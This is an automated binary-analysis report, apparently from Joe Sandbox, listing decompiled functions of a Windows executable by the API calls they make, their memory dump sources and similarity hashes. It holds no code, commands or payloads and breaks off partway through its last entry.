                    Function 00CD1121 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00CD1176
                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00CD1192
                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 00CD11F1
                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00CD1243
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: KeyboardState$InputMessagePostSend
                    • String ID:
                    • API String ID: 432972143-0
                    • Opcode ID: 234b8d558de2adead96ca320c8f178d1ec8ee269fd810dc693394f7d3e272588
                    • Instruction ID: fa1c7037b0f52c682632efa6747ceeae71b8a70220f20bab3610142141cf3b07
                    • Opcode Fuzzy Hash: 234b8d558de2adead96ca320c8f178d1ec8ee269fd810dc693394f7d3e272588
                    • Instruction Fuzzy Hash: AE31E9309406187AFF208A6588057FEBBAAAB45310F1C435FEBA1923D1C3758A559751
                    Function 00CA6415 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00CA644B
                    • __isleadbyte_l.LIBCMT ref: 00CA6479
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00CA64A7
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00CA64DD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 05b8fd267ca4d0cdc09b7ea4c93e3f967c51cdbf8a90dd46f406f0bba42cb3b7
                    • Instruction ID: 63b7dc8da8bda7ffb4dde7571bd62aa0304517f0c8c81605249b55676c046a62
                    • Opcode Fuzzy Hash: 05b8fd267ca4d0cdc09b7ea4c93e3f967c51cdbf8a90dd46f406f0bba42cb3b7
                    • Instruction Fuzzy Hash: DE31CD31600247AFDB22CF75C844BAA7BA5FF4A318F194429F864871A0EB31DA51DB90
                    Function 00CF5175 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32 ref: 00CF5189
                      • Part of subcall function 00CD387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CD3897
                      • Part of subcall function 00CD387D: GetCurrentThreadId.KERNEL32 ref: 00CD389E
                      • Part of subcall function 00CD387D: AttachThreadInput.USER32(00000000,?,00CD52A7), ref: 00CD38A5
                    • GetCaretPos.USER32(?), ref: 00CF519A
                    • ClientToScreen.USER32(00000000,?), ref: 00CF51D5
                    • GetForegroundWindow.USER32 ref: 00CF51DB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                    • String ID:
                    • API String ID: 2759813231-0
                    • Opcode ID: 412faef2df4431a455aaf2a245416de72f321150cb2a68a896b5ddb3de0af537
                    • Instruction ID: c0d6f0ebfd597cb5639c583c2f23831db55cd58a3d53fcfa5cf22d3fca379861
                    • Opcode Fuzzy Hash: 412faef2df4431a455aaf2a245416de72f321150cb2a68a896b5ddb3de0af537
                    • Instruction Fuzzy Hash: A831FC71900108AFDB00EFA5CD85EEFB7F9EF98300F10806AE515E7251EA75AE45DBA1
                    Function 00C90BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                    Download Yara Rule
                    APIs
                    • __setmode.LIBCMT ref: 00C90BF2
                      • Part of subcall function 00C75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CD7B20,?,?,00000000), ref: 00C75B8C
                      • Part of subcall function 00C75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CD7B20,?,?,00000000,?,?), ref: 00C75BB0
                    • _fprintf.LIBCMT ref: 00C90C29
                    • OutputDebugStringW.KERNEL32(?), ref: 00CC6331
                      • Part of subcall function 00C94CDA: _flsall.LIBCMT ref: 00C94CF3
                    • __setmode.LIBCMT ref: 00C90C5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                    • String ID:
                    • API String ID: 521402451-0
                    • Opcode ID: e494cd35f01a3b187fae85ce2d95b720d466b1d2c6104e2cfe71abe2e9e92fcf
                    • Instruction ID: 80137198f96526924a61e30e7a3ea13c4c5d7bca02c5d1f43bd712b134874198
                    • Opcode Fuzzy Hash: e494cd35f01a3b187fae85ce2d95b720d466b1d2c6104e2cfe71abe2e9e92fcf
                    • Instruction Fuzzy Hash: BD112731904608BFDF0873B49C4AEBE7B6DDF45320F14411AF208572D2DF605D46A3A6
                    Function 00CC8B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CC8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00CC8669
                      • Part of subcall function 00CC8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00CC8673
                      • Part of subcall function 00CC8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CC8682
                      • Part of subcall function 00CC8652: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00CC8689
                      • Part of subcall function 00CC8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00CC869F
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00CC8BEB
                    • _memcmp.LIBCMT ref: 00CC8C0E
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CC8C44
                    • HeapFree.KERNEL32(00000000), ref: 00CC8C4B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                    • String ID:
                    • API String ID: 2182266621-0
                    • Opcode ID: a870a1260e13af9ff7ce6f413bdeaa5de460e158c8117b05b59f3a963fc98682
                    • Instruction ID: fb2863b382bfb0b565318b904d2ae520c9b98091fd24aeb2f99c373637e7c626
                    • Opcode Fuzzy Hash: a870a1260e13af9ff7ce6f413bdeaa5de460e158c8117b05b59f3a963fc98682
                    • Instruction Fuzzy Hash: E2216B72E01209ABDB10DFA4C945FEEB7B8FF44355F15409DE564A7240DB31AA0ADB60
                    Function 00CE1A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                    Download Yara Rule
                    APIs
                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CE1A97
                      • Part of subcall function 00CE1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CE1B40
                      • Part of subcall function 00CE1B21: InternetCloseHandle.WININET(00000000), ref: 00CE1BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Internet$CloseConnectHandleOpen
                    • String ID:
                    • API String ID: 1463438336-0
                    • Opcode ID: 3b0f4382181216402288a13cb45a4cc27f2dbdc67147d308acb4447a05200f57
                    • Instruction ID: baafd4c4d8e11ae7fb98db4ab09e721c9136f1e49d87842aae0c928a677e1424
                    • Opcode Fuzzy Hash: 3b0f4382181216402288a13cb45a4cc27f2dbdc67147d308acb4447a05200f57
                    • Instruction Fuzzy Hash: 2521D471200641BFDB119F62CC00FBAB7ADFF44711F14001AFE5196650E731E921E794
                    Function 00CCE1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00CCF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00CCE1C4,?,?,?,00CCEFB7,00000000,000000EF,00000119,?,?), ref: 00CCF5BC
                      • Part of subcall function 00CCF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00CCF5E2
                      • Part of subcall function 00CCF5AD: lstrcmpiW.KERNEL32(00000000,?,00CCE1C4,?,?,?,00CCEFB7,00000000,000000EF,00000119,?,?), ref: 00CCF613
                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00CCEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00CCE1DD
                    • lstrcpyW.KERNEL32(00000000,?), ref: 00CCE203
                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CCEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00CCE237
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: lstrcmpilstrcpylstrlen
                    • String ID: cdecl
                    • API String ID: 4031866154-3896280584
                    • Opcode ID: 28d21ce7a2f8f5822c10e3f90d688e0fe136e062d170971a81ab5808f970076c
                    • Instruction ID: 8e24ce9a2dc3ae864eebebc26851b34618cda585fc4a4bf56a025bec6c704e01
                    • Opcode Fuzzy Hash: 28d21ce7a2f8f5822c10e3f90d688e0fe136e062d170971a81ab5808f970076c
                    • Instruction Fuzzy Hash: 3111BE36200301EFCB25AF64D849F7A77A9FF85350B40802EE916CB260EB719951D7A1
                    Function 00CA5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 00CA5351
                      • Part of subcall function 00C9594C: __FF_MSGBANNER.LIBCMT ref: 00C95963
                      • Part of subcall function 00C9594C: __NMSG_WRITE.LIBCMT ref: 00C9596A
                      • Part of subcall function 00C9594C: RtlAllocateHeap.NTDLL(00870000,00000000,00000001), ref: 00C9598F
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: 70a5fb7184d61bc0899a11d1b733b7581cc8f2c943886d6cbd65bcd859b6c4b2
                    • Instruction ID: 94dd54ca34c00e20d956a4e248850f2f0fde1f7a75628b1b273838890acdbb21
                    • Opcode Fuzzy Hash: 70a5fb7184d61bc0899a11d1b733b7581cc8f2c943886d6cbd65bcd859b6c4b2
                    • Instruction Fuzzy Hash: 9811E333506A17AFCF312F70AC4876E37989F563A8B10842AF9559B1B0DFB58A41A790
                    Function 00C74531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00C74560
                      • Part of subcall function 00C7410D: _memset.LIBCMT ref: 00C7418D
                      • Part of subcall function 00C7410D: _wcscpy.LIBCMT ref: 00C741E1
                      • Part of subcall function 00C7410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C741F1
                    • KillTimer.USER32(?,00000001,?,?), ref: 00C745B5
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C745C4
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CAD6CE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: a8d6a79805dc11c6cc0c8935b06333930c397a2e5577264ac2c21df048a4a783
                    • Instruction ID: 193850778eb8b48f65fc856de1cde367b0bdc6f048383edae795b4c09a34eab3
                    • Opcode Fuzzy Hash: a8d6a79805dc11c6cc0c8935b06333930c397a2e5577264ac2c21df048a4a783
                    • Instruction Fuzzy Hash: 4521F970904784AFEB728B24DC49BEBBBEC9F02308F04449EE6AF56241C7745B85DB51
                    Function 00CC8AF9 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00CC8B2A
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00CC8B31
                    • CloseHandle.KERNEL32(00000004), ref: 00CC8B4B
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CC8B7A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 2621361867-0
                    • Opcode ID: 94bcb39bf7b086e478fd5f3dd0787249de419be5f6ab33f819eb9ca2e35b6bdc
                    • Instruction ID: 6de5d05e75da99a64b0295d9ca1dc4b7556bcaf58eb30c274eef749ed1f95ee1
                    • Opcode Fuzzy Hash: 94bcb39bf7b086e478fd5f3dd0787249de419be5f6ab33f819eb9ca2e35b6bdc
                    • Instruction Fuzzy Hash: B0113DB250120DABDF018FA4DD49FEF7BA9EF08304F044069FE04A2160C7769E65DB61
                    Function 00CE667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CD7B20,?,?,00000000), ref: 00C75B8C
                      • Part of subcall function 00C75B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CD7B20,?,?,00000000,?,?), ref: 00C75BB0
                    • gethostbyname.WS2_32(?), ref: 00CE66AC
                    • WSAGetLastError.WS2_32(00000000), ref: 00CE66B7
                    • _memmove.LIBCMT ref: 00CE66E4
                    • inet_ntoa.WS2_32(?), ref: 00CE66EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: baf53718df7ae97cbd70a442d8cc3a2c55891d473567a26a24000471e4999e5c
                    • Instruction ID: 6f80c4e87098f53075095c8e9a27cd36e7e6257e3e44a33ee94df3187a344bc4
                    • Opcode Fuzzy Hash: baf53718df7ae97cbd70a442d8cc3a2c55891d473567a26a24000471e4999e5c
                    • Instruction Fuzzy Hash: 3D116335500509AFCB04FBA5DD86EEE77B8EF14350B148069F50AA71A1DF709E04EB51
                    Function 00CC9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00CC9043
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CC9055
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CC906B
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CC9086
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 61b0f4b5a9a62d084da09361274c835320193cdb54550b2ae2bd89f8ae77a5be
                    • Instruction ID: 12054206a62a6f7c87225a22810d4eadd5b656ef5af98b0cb1815c8e0f60a60c
                    • Opcode Fuzzy Hash: 61b0f4b5a9a62d084da09361274c835320193cdb54550b2ae2bd89f8ae77a5be
                    • Instruction Fuzzy Hash: 39114C79900218FFDB10DFA5C884FADBB74FB48310F204095E904B7250DA716E50DB94
                    Function 00CD1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CD01FD,?,00CD1250,?,00008000), ref: 00CD166F
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00CD01FD,?,00CD1250,?,00008000), ref: 00CD1694
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CD01FD,?,00CD1250,?,00008000), ref: 00CD169E
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00CD01FD,?,00CD1250,?,00008000), ref: 00CD16D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID:
                    • API String ID: 2875609808-0
                    • Opcode ID: 99c0b4497553835af85124c778acb543d63fa3173e52bb53255c6a9a385ba443
                    • Instruction ID: 50a4dc0262bed43a442591870631bcffbaa6f8e72dcc7c374d893a19f1df57ee
                    • Opcode Fuzzy Hash: 99c0b4497553835af85124c778acb543d63fa3173e52bb53255c6a9a385ba443
                    • Instruction Fuzzy Hash: 4F111C31C10519E7CF009FA5D949BFEBB78FF09751F09405AEE40B6240CB709562CB96
                    Function 00CA7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: 650b1b02ab57d4ba640193b8fe3d25bf4b4c710603b46194f3fa377503de04fe
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: 2A014B3614814AFBCF125F94CC059EE3F66BF6A359F588715FA2858031D236CAB1AB81
                    Function 00CFB57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00CFB59E
                    • ScreenToClient.USER32(?,?), ref: 00CFB5B6
                    • ScreenToClient.USER32(?,?), ref: 00CFB5DA
